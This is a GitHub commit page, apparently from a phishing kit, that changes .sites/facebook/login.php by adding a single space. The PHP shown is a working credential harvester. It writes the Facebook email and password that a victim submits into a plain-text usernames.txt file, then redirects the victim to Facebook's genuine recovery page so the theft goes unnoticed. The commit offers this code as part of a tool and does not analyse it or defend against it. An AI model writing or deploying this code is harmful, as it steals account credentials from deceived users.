Skip to content

Commit a400acf

Browse files
committed
Minor Fix for Facebook/login.php (Just a space)
1 parent e159dae commit a400acf

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

.sites/facebook/login.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
<?php
2-
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
2+
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
33
header('Location: https://facebook.com/recover/initiate/');
44
exit();
55
?>

0 commit comments

Comments
 (0)